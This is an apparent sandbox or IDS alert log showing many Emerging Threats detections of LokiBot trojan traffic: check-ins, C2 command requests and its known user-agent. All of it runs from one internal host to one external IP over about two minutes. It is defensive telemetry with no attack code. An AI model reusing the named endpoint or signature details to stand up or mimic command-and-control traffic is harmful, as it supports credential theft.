ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:48.957388
SID:	2024318
Source Port:	49829
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:55.998033
SID:	2024313
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:20.907030
SID:	2825766
Source Port:	49867
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:46.592042
SID:	2021641
Source Port:	49826
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:48.178974
SID:	2025381
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:53.641650
SID:	2021641
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:55.998033
SID:	2024318
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:00.493399
SID:	2024318
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:02.814837
SID:	2024313
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:27.203747
SID:	2021641
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:23.194950
SID:	2825766
Source Port:	49870
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:48.957388
SID:	2024313
Source Port:	49829
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:03.603579
SID:	2024318
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:14.663983
SID:	2825766
Source Port:	49861
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:34.204192
SID:	2021641
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:13.897343
SID:	2024318
Source Port:	49860
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:37.305241
SID:	2025381
Source Port:	49815
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:00.493399
SID:	2024313
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:04.359604
SID:	2825766
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:01.279270
SID:	2024313
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:06.206380
SID:	2025381
Source Port:	49849
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:37.260471
SID:	2024313
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:27.203747
SID:	2825766
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:11.610579
SID:	2024318
Source Port:	49857
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:24.081982
SID:	2021641
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:01.546959
SID:	2025381
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:37.260471
SID:	2024318
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:51.920859
SID:	2021641
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:57.593507
SID:	2024313
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:30.251229
SID:	2025381
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:11.610579
SID:	2024313
Source Port:	49857
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:17.815577
SID:	2021641
Source Port:	49863
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:02.814837
SID:	2024318
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:57.593507
SID:	2024318
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:01.279270
SID:	2024318
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:33.293191
SID:	2021641
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:46.581121
SID:	2024313
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:17.112021
SID:	2825766
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:22.504191
SID:	2025381
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:00.769505
SID:	2825766
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:33.293191
SID:	2825766
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:35.733011
SID:	2024313
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:46.592042
SID:	2825766
Source Port:	49826
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:28.699735
SID:	2024313
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:19.370644
SID:	2025381
Source Port:	49865
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:28.699735
SID:	2024318
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:03.603579
SID:	2825766
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:23.301208
SID:	2024313
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:20.907030
SID:	2021641
Source Port:	49867
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:13.652600
SID:	2021641
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:20.970310
SID:	2021641
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:35.733011
SID:	2024318
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:21.669304
SID:	2025381
Source Port:	49868
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:10.531874
SID:	2021641
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:23.301208
SID:	2024318
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:56.772335
SID:	2021641
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:40.344957
SID:	2825766
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:12.861151
SID:	2025381
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:23.961991
SID:	2025381
Source Port:	49871
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:56.772335
SID:	2825766
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:34.975531
SID:	2025381
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:45.801533
SID:	2024313
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:20.136720
SID:	2024313
Source Port:	49866
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:03.119856
SID:	2825766
Source Port:	49845
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:08.547895
SID:	2025381
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:20.136720
SID:	2024318
Source Port:	49866
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:39.580792
SID:	2024313
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:51.920859
SID:	2825766
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:29.470677
SID:	2021641
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:39.580792
SID:	2024318
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:24.862546
SID:	2025381
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:58.921065
SID:	2021641
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:31.907019
SID:	2021641
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:45.801533
SID:	2024318
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:05.441892
SID:	2021641
Source Port:	49848
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:24.081982
SID:	2825766
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:52.706701
SID:	2825766
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:42.690473
SID:	2024318
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:55.998033
SID:	2021641
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:20.970310
SID:	2025381
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:43.454363
SID:	2025381
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:57.593507
SID:	2825766
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:55.812911
SID:	2021641
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:42.690473
SID:	2024313
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:06.739588
SID:	2025381
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:15.463121
SID:	2024318
Source Port:	49862
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:27.203747
SID:	2024318
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:24.825007
SID:	2024318
Source Port:	49872
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:15.463121
SID:	2024313
Source Port:	49862
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:06.739588
SID:	2825766
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:33.437852
SID:	2025381
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:10.846749
SID:	2021641
Source Port:	49856
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:37.260471
SID:	2825766
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:27.203747
SID:	2024313
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:24.081982
SID:	2024313
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:25.556361
SID:	2025381
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:48.181654
SID:	2021641
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:43.454363
SID:	2825766
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:07.768549
SID:	2021641
Source Port:	49851
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:51.920859
SID:	2024318
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:41.966393
SID:	2025381
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:49.735329
SID:	2825766
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:24.081982
SID:	2024318
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:52.865138
SID:	2024313
Source Port:	49834
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:55.220105
SID:	2025381
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:52.865138
SID:	2024318
Source Port:	49834
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:51.920859
SID:	2024313
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:05.891670
SID:	2024318
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:05.891670
SID:	2024313
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:08.547895
SID:	2024313
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:46.581121
SID:	2021641
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:33.293191
SID:	2024313
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:35.733011
SID:	2825766
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:33.293191
SID:	2024318
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:44.269499
SID:	2021641
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

